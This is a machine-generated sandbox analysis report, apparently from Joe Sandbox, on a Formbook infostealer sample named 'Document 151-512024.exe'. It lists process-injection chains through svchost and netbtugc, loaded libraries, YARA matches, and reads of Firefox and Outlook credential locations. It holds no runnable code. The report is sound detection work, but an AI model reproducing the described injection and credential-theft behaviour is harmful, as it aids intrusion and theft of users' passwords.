Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03445630	10_2_03445630
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034B16CC	10_2_034B16CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034B7571	10_2_034B7571
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034C95C3	10_2_034C95C3
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0349D5B0	10_2_0349D5B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033F1460	10_2_033F1460
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034BF43F	10_2_034BF43F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034BFB76	10_2_034BFB76
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03475BF0	10_2_03475BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0343DBF9	10_2_0343DBF9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0341FB80	10_2_0341FB80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034BFA49	10_2_034BFA49
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034B7A46	10_2_034B7A46
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03473A6C	10_2_03473A6C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034ADAC6	10_2_034ADAC6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03445AA0	10_2_03445AA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0349DAAC	10_2_0349DAAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034A1AA3	10_2_034A1AA3
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03409950	10_2_03409950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0341B950	10_2_0341B950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03495910	10_2_03495910
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0346D800	10_2_0346D800
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034038E0	10_2_034038E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034BFF09	10_2_034BFF09
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03401F92	10_2_03401F92
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033C3FD5	10_2_033C3FD5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033C3FD2	10_2_033C3FD2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034BFFB1	10_2_034BFFB1
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03409EB0	10_2_03409EB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03403D40	10_2_03403D40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034B1D5A	10_2_034B1D5A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034B7D73	10_2_034B7D73
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0341FDC0	10_2_0341FDC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03479C32	10_2_03479C32
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_034BFCF2	10_2_034BFCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C115E0	10_2_02C115E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C0C7C7	10_2_02C0C7C7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C0C7D0	10_2_02C0C7D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C0AA70	10_2_02C0AA70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C0C9F0	10_2_02C0C9F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C130EE	10_2_02C130EE
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C130F0	10_2_02C130F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C29FD0	10_2_02C29FD0

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0332B970 appears 283 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03375130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 033AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 033BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03387E54 appears 109 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 03435130 appears 58 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 0347F290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 033EB970 appears 283 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 03447E54 appears 109 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 0346EA12 appears 86 times
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: String function: 0095F9F2 appears 40 times
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: String function: 00960A30 appears 46 times
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: String function: 00949CB3 appears 31 times

Source: Document 151-512024.exe, 00000000.00000003.1224338538.0000000003B7D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Document 151-512024.exe
Source: Document 151-512024.exe, 00000000.00000003.1221860341.0000000003983000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Document 151-512024.exe

Source: Document 151-512024.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@14/12

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009B37B5 GetLastError,FormatMessageW,

0_2_009B37B5

Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009A10BF AdjustTokenPrivileges,CloseHandle,		0_2_009A10BF
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009A16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_009A16C3

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009B51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_009B51CD

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009CA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_009CA67C

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009B648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_009B648E

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009442A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_009442A2

Source: C:\Users\user\Desktop\Document 151-512024.exe

File created: C:\Users\user\AppData\Local\Temp\autB569.tmp

Jump to behavior

Source: Document 151-512024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\Document 151-512024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: netbtugc.exe, 0000000A.00000003.1579465591.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3689176760.000000000301E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3689176760.0000000002FF2000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3689176760.0000000002FFB000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1579659701.0000000002FF2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Document 151-512024.exe	ReversingLabs: Detection: 63%
Source: Document 151-512024.exe	Virustotal: Detection: 61%

Source: unknown	Process created: C:\Users\user\Desktop\Document 151-512024.exe "C:\Users\user\Desktop\Document 151-512024.exe"
Source: C:\Users\user\Desktop\Document 151-512024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Document 151-512024.exe"
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Document 151-512024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Document 151-512024.exe"	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Document 151-512024.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document 151-512024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document 151-512024.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document 151-512024.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document 151-512024.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document 151-512024.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document 151-512024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document 151-512024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document 151-512024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document 151-512024.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Document 151-512024.exe

Static file information: File size 1246208 > 1048576

Source: Document 151-512024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Document 151-512024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Document 151-512024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Document 151-512024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Document 151-512024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Document 151-512024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Document 151-512024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3689713194.0000000000BEE000.00000002.00000001.01000000.00000005.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3689548451.0000000000BEE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: Document 151-512024.exe, 00000000.00000003.1222502312.0000000003860000.00000004.00001000.00020000.00000000.sdmp, Document 151-512024.exe, 00000000.00000003.1223460110.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1278781455.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1393001224.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1393001224.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1275345083.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1396093652.000000000321A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3691575499.000000000355E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3691575499.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1393025365.000000000306C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Document 151-512024.exe, 00000000.00000003.1222502312.0000000003860000.00000004.00001000.00020000.00000000.sdmp, Document 151-512024.exe, 00000000.00000003.1223460110.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1278781455.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1393001224.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1393001224.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1275345083.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 0000000A.00000003.1396093652.000000000321A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3691575499.000000000355E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3691575499.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1393025365.000000000306C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1392801027.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1344247546.0000000002C14000.00000004.00000020.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3688580630.00000000004B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 0000000A.00000002.3692885046.00000000039EC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3689176760.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1686439407.000000000E69C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 0000000A.00000002.3692885046.00000000039EC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3689176760.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1686439407.000000000E69C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1392801027.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1344247546.0000000002C14000.00000004.00000020.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3688580630.00000000004B8000.00000004.00000020.00020000.00000000.sdmp

Source: Document 151-512024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Document 151-512024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Document 151-512024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Document 151-512024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Document 151-512024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009442DE

Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_00960A76 push ecx; ret	0_2_00960A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004048A9 push esp; ret	2_2_004048AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00420933 push es; ret	2_2_00420953
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E2BA push 00000038h; iretd	2_2_0041E2BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A436 push ebx; iretd	2_2_0041A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418C92 pushad ; retf	2_2_00418C93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A5D9 push ebx; iretd	2_2_0041A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004017E5 push ebp; retf 003Fh	2_2_004017E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403780 push eax; ret	2_2_00403782
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004147A2 push es; iretd	2_2_004147AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330225F pushad ; ret	2_2_033027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033027FA pushad ; ret	2_2_033027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033309AD push ecx; mov dword ptr [esp], ecx	2_2_033309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330283D push eax; iretd	2_2_03302858
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033C225F pushad ; ret	10_2_033C27F9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033C27FA pushad ; ret	10_2_033C27F9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033F09AD push ecx; mov dword ptr [esp], ecx	10_2_033F09B6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_033C283D push eax; iretd	10_2_033C2858
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C12238 pushad ; iretd	10_2_02C12239
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C1AB37 push 00000038h; iretd	10_2_02C1AB3B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C10EAB push ebp; retf	10_2_02C10EAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C16E56 push ebx; iretd	10_2_02C16E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C16CB3 push ebx; iretd	10_2_02C16E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C1101F push es; iretd	10_2_02C11027
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C1D1AB push es; ret	10_2_02C1D1D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C1D1B0 push es; ret	10_2_02C1D1D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C01126 push esp; ret	10_2_02C01127
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C1550F pushad ; retf	10_2_02C15510
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C1D83B push esi; iretd	10_2_02C1D83C
